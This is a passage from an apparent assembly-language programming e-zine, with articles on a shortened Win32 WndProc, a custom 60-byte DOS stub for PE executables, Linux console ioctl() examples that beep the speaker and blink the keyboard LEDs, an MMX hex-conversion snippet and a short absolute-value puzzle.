tweaked WndProc. Namely, if you leave the stack as you found it, the arguments for the DefWindowProc are already in place, and the return address of our caller is there too. So basically we can just jump to it without any further ado. The resulting WndProc that is equivalent to the original one will look like this then: WndProc PROC hWnd EQU dword ptr [esp][4] uMsg EQU dword ptr [esp][8] wParam EQU dword ptr [esp][12] lParam EQU dword ptr [esp][16] .IF uMsg == WM_DESTROY INVOKE PostQuitMessage, NULL .ELSE jmp DefWindowProc .ENDIF xor eax, eax ret 4 * sizeof dword ; Be sure to clean that stack! WndProc ENDP Yes, much shorter, and faster. Let's take a look at the generated code to get a better understanding of how much shorter it actually is: cmp dword ptr [esp+08], WM_DESTROY jne @@noDestroy push NULL Call PostQuitMessage jmp @@exitFromDestroy @@noDestroy: Jmp DefWindowProcA @@exitFromDestroy xor eax, eax ret 0010 If you code it 'by hand' instead of with the .IF statement, there's another tweak we can pull, but the rest looks great, doesn't it? Of course these stunts can be applied to other procedures as well. Be careful, and use them in good health. ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING Programming the DOS Stub by X-Calibre of Diamond As you may (or may not) know, there is a piece of DOS code still in every Win32 executable file. This piece of code is referred to as the 'stub' and ensures that the Win32 program won't cause a crash when run on a DOS system. It just prints the familiar 'This program can not be run in DOS' message and exits. 'So what do we care?' you might ask... Well, Microsoft's linker provides the option to link your own stub instead of the standard one. And, you must have guessed it already by now: We can do it better than Microsoft! So, how do we do this then? Well, actually it's very simple: The first part of the Win32 executable is literally a DOS file. There's just one small requirement: at offset 3Ch (60) there is a DWORD specifying the start of the PE block relative to the start of the file (the offset). So basically you can just put any DOS EXE program in there, as long as you make sure that there is room for the DWORD at offset 3Ch in the file. Usually this is no problem, since the EXE header itself is usually quite big, and a lot of the space is not being used. Microsoft's own stub has an empty header mostly, and the code starts right after the DWORD, at offset 40h. That's all fine and nice and whatever, but what can we do with this info? Well, you could link in an entire DOS program for people not using Windows (Look at REGEDIT.EXE in Windows 9x for an example). You could include a Fire or Plasma effect when your program is run in DOS. You could create your own 'This program can not be run in DOS mode' message. But, most importantly: you can create smaller EXE files! One of the nicer applications of this stub, which I'm going to explain a bit here. What is the smallest size for the stub, theoretically speaking? Well, considering the fact that at offset 60 there MUST be an offset pointing to the PE header, the minimum size will be 60 bytes. The actual stub file has to be 64 bytes, because of restrictions of Microsoft's linker. But be sure not to use the last 4 bytes, since the linker will put in the offset there. Well, so in 60 bytes, you can't really do much. But just printing a small warning for DOS users and then exiting is just about possible. Microsoft made their version a little large: 120 bytes. So we can try to do just about the same in 60 bytes. We're going to use a little trick here, to get the program as small as 60 bytes. At offset 20h, there is room for a relocation table for the code. But since we won't be needing them, we're going to put our code in there. This is perfectly possible, because you can specify how many relocation table items your program will be using. We just put in a 0 word at offset 6 in the header, and the table is ours. Technically speaking, the code is still after the table. The table just has a length of 0 bytes. For all you non-DOS coders out there, this is what the program looks like: ;====================================================================stub.asm .Model Tiny .code start: push cs ; Point the data segment to the code segment, since pop ds ; we're putting the data after the code to save space. mov dx, offset message ; Load pointer to the string for the call. mov ah, 9 ; 9 is the print argument for int 21h. int 21h ; The DOS interrupt. mov ah, 4Ch ; 4C is the exit argument for int 21h int 21h ; Put our string here message db "Windows prg!",0Dh,0Ah,'$' ; A little explanation may be required: ; ; 0Dh is the 'Carriage return' ASCII code. ; 0Ah is the 'Line feed' ASCII code. ; '$' is the string-terminator in DOS (like 0 is in Windows and other C based ; OSes) end start ;=========================================================================EOF The message can be 15 bytes at most, including the string terminator, since the program itself starts at offset 32 in the file, and is 12 bytes long. (32+12+15 = offset 59 bytes, so the next byte will be used for the PE offset DWORD). This version yields an undefined error code on exit. The error code is specified in al when you call the exit DOS function. The errorcode actually depends on the output in al of the int 21h call that prints the string. This is ofcourse undefined (actually it is 24h in Windows 98). Microsoft's stub has a defined errorcode of 1. If you want to make your stub 100% the same, then you must replace the 'mov ah, 4Ch' with 'mov ax, 4C01h'. Mind you, that this code is 1 byte longer, so your message can then be only 14 bytes long in total. Since I'm never going to use the errorcode, I decided to save the byte and use a larger string. And that's that. Now you may run into trouble with the linker. I couldn't find a linker that kept the EXE header to its minimum (which is 32 bytes). I used TLINK, which made a 512 byte header. So I just edited the file manually, and got it to its minimum size. A document explaining the EXE header format is enclosed, and so is the STUB.EXE I made, and a small Win32 application using it (with relocated PE header at 40h). I will just briefly describe how the filesize is stored in the header, since the document is not particularly clear there. offset length description comments ---------------------------------------------------------------------- 2 word length of last used sector in file modulo 512 4 word size of file, incl. header in 512-pages The '512-pages' at offset 4 are (floppy) disk sectors. They are 512 bytes each. So to calculate how many sectors your file will occupy, this formula will suffice: sectors = CEILING(filesize/512) CEILING means to round off to nearest natural number above the fraction. The length of the last used sector at offset 2 stores how many bytes are occupied in the last sector of the file. Like the comment says, it's filesize modulo 512. In other words: lastusedsector = filesize - FLOOR(filesize/512) The other way around is ofcourse like this: filesize = (sectors - 1)*512 + lastusedsector A little note here: Look at these 2 values in a program with the standard Microsoft stub (eg. NOTEPAD.EXE). We find these 2 values: offset 2: 0090h offset 4: 0003h So the filesize is: (3 - 1)*512 + 144 = 1168 Now wait just a second! At offset 3Ch we find 00000080h... So at offset 128 we find the PE header and the Windows program. Then how can the DOS stub be 1168 bytes? It can't!! Microsoft goofed up here... They have probably hand-edited the EXE file they used for the stub like I did, and forgot to edit these values. Luckily for them, this bug does no harm. But still... Well, after we have created our DOS stub, all we have to do is link it in. With Microsoft's linker it goes like this: LINK code.obj /SUBSYSTEM:WINDOWS /STUB:STUB.EXE And that's all you need! You can ignore the warning the linker gives about the incomplete header. We know that the program runs. The linker just doesn't consider EXE headers with no relocation table (which could actually be considered a bug, since our EXE header specifies that the table has length 0, and therefore the code can start at offset 20h. The DOS EXE loader does interpret it correctly, so in fact, the linker could be considered incompatible). The only problem with Microsoft's linker is that it doesn't seem to want to link the PE block right after the DOS stub. Maybe other linkers do, but I haven't found one that does yet. Microsoft's linker just dumps some garbage, and then puts its PE block at offset 78h. Maybe that is because their stub is 78h bytes long and they don't consider shorter stubs? The offset at which the PE block is linked depends on the initial SP value specified at offset 10h, actually (why is that?). It can also link at offset 80h or 88h. You could move the PE block to offset 40h, and pad with 0's after the PE block, using a hex-editor. This way it will compress even better, maybe. And you could perhaps edit the PE block and move the code forward a bit too (there's a great util in this. Shall we make it?). Well, anyway... Have fun, and get crazy with your custom DOS stubs! And remember: DOS Knowledge is power! ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::............................................THE.UNIX.WORLD Using ioctl() by mammon_ One of the most famous Unix maxims reads 'everything is a file'; directories are files, pipes are files, hardware devices are files, even files are files. This provided a transparent means or reading and writing hardware or software constructs such as modems and sockets; yet the lack of interrupts or device driver routines is sometimes confusing for those not used to Unix programming. In linux, handling device parameters through the character and block 'special file' interface is handled through ioctl(). The ioctl() system call takes a file descriptor and a request type as its primary arguments, along with an optional third argument referred to as "argp" which contains any arguments that must be passed along with the request. The possible ioctl() requests can be found by poking around in the $INCLUDE/asm and $INCLUDE/linux header files, although a somewhat dated list of requests can be viewed by typing 'man ioctl_list'. One of the most useful devices to program with ioctl() for the applications programmer will be the console; in linux terms, this consists of the keyboard and display, such that all 63 of the Virtual Consoles can be controlled with ioctl(). This can be useful if one wants to output debugging information to a non-visible console, or to transfer STDIN and STDOUT to a newly-allocated console while disabling virtual console switching, effectively tying the user to a single console [e.g., in a walkup workstation]. Information on console ioctl requests can be found with 'man console_ioctl'. Bringing up this man page instantly displays the following text: WARNING: If you use the following information you are going to burn yourself. WARNING: ioctl's are undocumented Linux internals, liable to be changed without warning. Use POSIX functions. This is ancient asm coderspeak meaning 'you are on the right track, keep going.' Perusing the listed requests will provide enough information to code that first exercise from DOS-ASM 1o1: generating a tone on the PC speaker. KDMKTONE Generate tone of specified length. The lower 16 bits of argp specify the period in clock cycles, and the upper 16 bits give the duration in msec. If the duration is zero, the sound is turned off. Control returns immediately. For example, argp = (125<<16) + 0x637 would specify the beep normally associated with a ctrl-G. (Thus since 0.99pl1; broken in 2.1.49-50.) This should not be too terribly hard to implement -- a call to open the file descriptor, and a single call to ioctl() to sound the tone. First things first, open() is called on /dev/tty to create a handle for the current console: #-------------------------------------------------------------------beep.asm %define O_RDWR 2 ;grep O_RDWR /usr/include/asm/* %define KDMKTONE 0x4B30 ;grep KDMKTONE /usr/include/linux/* EXTERN open GLOBAL main section .data szTTY db '/dev/tty',0 section .text main: push dword O_RDWR push dword szTTY call open add esp, 8 #--------------------------------------------------------------------BREAK Next, calculate the frequency and duration of the tone to be played: #---------------------------------------------------------------------CONT mov dx, 666 ;duration shl edx, 16 or dx, 1199 ;tone #--------------------------------------------------------------------BREAK Now, normally one might call ioctl as so: push edx push dword KDMKTONE push eax call ioctl add esp, 12 However, ioctl is a systemcall, and we can save a bit of time by going straight through the syscall gate at 0x80: #---------------------------------------------------------------------CONT mov ebx, eax mov ecx, KDMKTONE mov eax, 54 ;ioctl func defined in /usr/include/asm/unistd.h int 0x80 ret #----------------------------------------------------------------------EOF So much for the simple beep. Another ASM 101 favorite is the 'blinking LED' trick, where students learn to make the keyboard LEDs blink on and off in any number of psychedelic patterns. A quick tour through the man page shows the requests needed for this sample as well: KDGETLED Get state of LEDs. argp points to a long int. The lower three bits of *argp are set to the state of the LEDs, as follows: LED_CAP 0x04 caps lock led LED_NUM 0x02 num lock led LED_SCR 0x01 scroll lock led KDSETLED Set the LEDs. The LEDs are set to correspond to the lower three bits of argp. However, if a higher order bit is set, the LEDs revert to normal: dis- playing the state of the keyboard functions of caps lock, num lock, and scroll lock. The file descriptor must be opened as with the previous example. From there, we must get the current LED state: #--------------------------------------------------------------------led.asm %define KDGETLED 0x4B31 ;grep KDGETLED /usr/include/linux/* %define KDSETLED 0x4B32 ;grep KDSETLED /usr/include/linux/* xor edx, edx mov ecx, KDGETLED mov ebx, eax mov eax, 54 int 0x80 #--------------------------------------------------------------------BREAK Next, all of the LEDs will be turned on and then off 10 times. It is vital to the success of the algorithm that a delay be present between the off and on transitions; otherwise the LEDs will appear to be steadily lit, and that is much less of a programming achievement: #---------------------------------------------------------------------CONT mov ecx, 10 .here: push ecx ;save counter or edx, 0x07 ;set all of 'em mov ecx, KDSETLED mov eax, 54 int 0x80 mov ecx, 0xFFFFFF ;delay counter .delay: loop .delay and edx, 0 ;turn all of them off mov ecx, KDSETLED mov eax, 54 int 0x80 mov ecx, 0xFFFFFF ;next delay counter .delay2: loop .delay2 pop ecx loop .here ret #----------------------------------------------------------------------EOF Blinking the LEDs in succession and achieving hypnotic frequency via ioctl() will be left as an exercise to the reader. This should provide a quick introduction to using ioctl(). There are many more possibilities available for scan codes, screen painting, and virtual console control; further opportunities for console amusement exist also within the realm of escape-sequence programming. The examples presented here can be compiled with the standard nasm -f elf file.asm gcc -o file file.o combination, or by using a Makefile: #----------------------------------------------------------------------Makefile TARGET =beep #TARGET is the variable storing the base filename ASM = nasm #ASM contains the name of the assembler ASMFILE = $(TARGET).asm #ASMFILE contains the full name of the source file OBJFILE = $(TARGET).o #OBJFILE contains the full name of the object file LINKER = gcc #LINKER contains the full name of the linker LIBS = #LIBS contains any library flags LIBDIR = #LIBDIR contains any library location flags all: #the 'all:' section applies to all targets $(ASM) -o $(OBJFILE) -f elf $(ASMFILE) $(LINKER) -o $(TARGET) $(OBJFILE) $(LIBDIR) $(LIBS) #---------------------------------------------------------------------------EOF As with all Makefiles, with the target correctly set the source will be compiled and linked simply by typing 'make' in the directory where the Makefile is located. ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS BinToString by Cecchinel Stephan ;Summary: Converts a 32 bit number to an 8-byte string. ;Compatibility: MMX+ ;Notes: 14 cycles. Input is stored in EAX; the output is a hex- ; format character string pointed to by [EDI]. Sum1: dd 0x30303030, 0x30303030 Mask1: dd 0x0f0f0f0f, 0x0f0f0f0f Comp1: dd 0x09090909, 0x09090909 Hex32: bswap eax movq mm3,[Sum1] movq mm4,[Comp1] movq mm2,[Mask1] movq mm5,mm3 psubb mm5,mm4 movd mm0,eax movq mm1,mm0 psrlq mm0,4 pand mm0,mm2 pand mm1,mm2 punpcklbw mm0,mm1 movq mm1,mm0 pcmpgtb mm0,mm4 pand mm0,mm5 paddb mm1,mm3 paddb mm1,mm0 movq [edi],mm1 ret ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::...........................................ISSUE.CHALLENGE Absolute Value by Laura Fairhead The Challenge ------------- Find the absolute value of a register in only 4 bytes. The Solution ------------ NEG AX JL SHORT $-2 This was not completely my original idea (is there such thing??); I found a similar sequence which used the more obvious branch 'JS'. The JS had the problem that it goes into an infinite loop if AX=08000h. ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::.......................................................FIN